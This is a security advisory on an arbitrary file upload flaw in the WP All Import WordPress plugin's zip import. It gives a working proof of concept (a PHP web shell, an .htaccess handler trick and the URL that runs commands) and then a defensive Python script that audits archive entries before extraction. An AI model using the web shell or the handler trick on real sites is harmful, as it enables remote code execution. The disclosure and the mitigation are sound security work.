The plugin does not properly restrict which file extensions may be imported on the server. Because uploaded archives are extracted into a web-served directory without the entry names being filtered, any user who can reach the import page can upload arbitrary files. This matters most on multi-site WordPress installations: there, a site administrator is not a super admin and is deliberately denied the unfiltered_upload capability, so the plugin lets that role cross a boundary WordPress itself enforces.
[1] Create 'poc.zip' containing the following 2 files.

[1-1] 'exploit.php.txt' is as follows.
----------------------------------
<?php system($_GET['cmd']); ?>
----------------------------------

[1-2] '.htaccess' is as follows.
----------------------------------
<IfModule mod_rewrite.c>
AddHandler application/x-httpd-php .php .html
</IfModule>
----------------------------------

Note on why the '.txt' file executes: AddHandler is a mod_mime directive, and mod_mime applies it to every dotted segment of a filename, not only the last one, so 'exploit.php.txt' is handed to the PHP handler once '.php' is registered. The <IfModule mod_rewrite.c> wrapper only gates the directive on mod_rewrite being loaded; it is not otherwise needed. The step also depends on the server honouring .htaccess files in the uploads directory (AllowOverride permitting FileInfo), which is the default in many Apache-based WordPress deployments.

[2] Upload 'poc.zip' via the [Upload a file] button on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'.

[3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands.

* fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string taken from the server response to the upload; it differs per upload.
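The check a maintainer would want in front of the extraction step is a pre-extraction audit of the archive's entry names that rejects exactly the two tricks the PoC relies on: a server configuration file ('.htaccess') and an executable extension hidden in a middle segment ('exploit.php.txt'). The script below is an added example written for this page; it is not the plugin's own code and WP All Import does not ship it. It rebuilds the advisory's 'poc.zip' in memory as constructed test input, and the allowlist of import extensions (xml, csv, txt, json, gz, zip) is an assumption chosen for illustration, not the plugin's real list.

```python
from __future__ import annotations

import io
import zipfile

# Extensions an import feature legitimately needs. This allowlist is an
# assumption for the example; the plugin's actual list is not on the page.
IMPORT_ALLOWLIST = {"xml", "csv", "txt", "json", "gz", "zip"}

# Names that change how the web server treats the directory they land in.
SERVER_CONFIG_FILES = {".htaccess", ".htpasswd", ".user.ini", "web.config"}

# Segments a PHP handler may be bound to. Apache's mod_mime applies AddHandler
# to every dotted segment of a name, so "exploit.php.txt" runs as PHP once
# ".php" is handled; the check therefore looks at all segments, not the last.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def classify_entry(name: str) -> list[str]:
    """Return the reasons an archive member must be rejected; [] means allowed."""
    reasons: list[str] = []
    norm = name.replace("\\", "/")
    parts = norm.split("/")
    if norm.startswith("/") or ".." in parts:
        reasons.append("path traversal or absolute path")
    base = parts[-1]
    if base == "":
        return reasons  # directory entry: nothing to serve or execute
    if base.lower() in SERVER_CONFIG_FILES:
        reasons.append("server configuration file")
    # Every extension segment after the first dot, lower-cased for comparison.
    segments = [s.lower() for s in base.split(".")[1:]]
    exec_hits = [s for s in segments if s in EXECUTABLE_SEGMENTS]
    if exec_hits:
        reasons.append(f"executable extension segment: .{exec_hits[0]}")
    if not segments or segments[-1] not in IMPORT_ALLOWLIST:
        reasons.append("final extension not in import allowlist")
    return reasons


def audit_zip(data: bytes) -> dict[str, list[str]]:
    """Map each rejected member of an in-memory zip to its reasons; {} means clean.

    Runs on the central directory only, before anything is written to disk.
    """
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = classify_entry(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_poc_zip() -> bytes:
    """Rebuild the advisory's 'poc.zip' in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("exploit.php.txt", "<?php system($_GET['cmd']); ?>\n")
        zf.writestr(
            ".htaccess",
            "<IfModule mod_rewrite.c>\n"
            "AddHandler application/x-httpd-php .php .html\n"
            "</IfModule>\n",
        )
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """A legitimate import bundle (constructed), used to show the audit passes it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("products.xml", "<products><product><sku>1</sku></product></products>\n")
        zf.writestr("prices.csv", "sku,price\n1,9.99\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("poc.zip", build_poc_zip()), ("benign.zip", build_benign_zip())):
        findings = audit_zip(blob)
        print(f"{label}: {'REJECT' if findings else 'accept'}")
        for member, reasons in findings.items():
            print(f"  {member}: {'; '.join(reasons)}")
```

The audit runs over the central directory before extraction, which is the point where the plugin's filtering is missing; rejecting the whole archive on any finding avoids partially extracted uploads. It is a last line of defence, not a substitute for the server-side fix: the uploads tree should not execute PHP at all (a SetHandler/php_admin_flag block or an equivalent nginx location), and AllowOverride should not let a user-supplied .htaccess re-enable it.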
2022-10-14
2022-10-15
2022-10-17